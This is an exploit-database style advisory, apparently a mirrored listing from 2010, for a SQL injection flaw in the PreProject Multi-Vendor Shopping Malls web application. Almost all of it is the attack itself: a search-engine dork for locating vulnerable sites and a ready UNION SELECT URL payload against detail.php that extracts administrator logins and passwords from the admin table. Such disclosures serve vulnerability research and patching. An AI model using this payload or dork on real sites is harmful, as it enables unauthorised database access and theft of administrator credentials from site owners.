PreProject Multi-Vendor Shopping Malls – SQL Injection

  • 作者: Sangteamtham
    日期: 2010-06-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13987/
  • #######################################################################
#
# Source: Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability
# Download: http://preproject.com/products.asp
# Dork: inurl:Powered by: PreProjects + detail.php?prodid=694
# Author: Sangteamtham@gmail.com
#
#######################################################################

Exploit :

http://server/detail.php?prodid=999999+UNION SELECT
1,2,3,group_concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
from admin

Discovered since Wed, Jul 15, 2009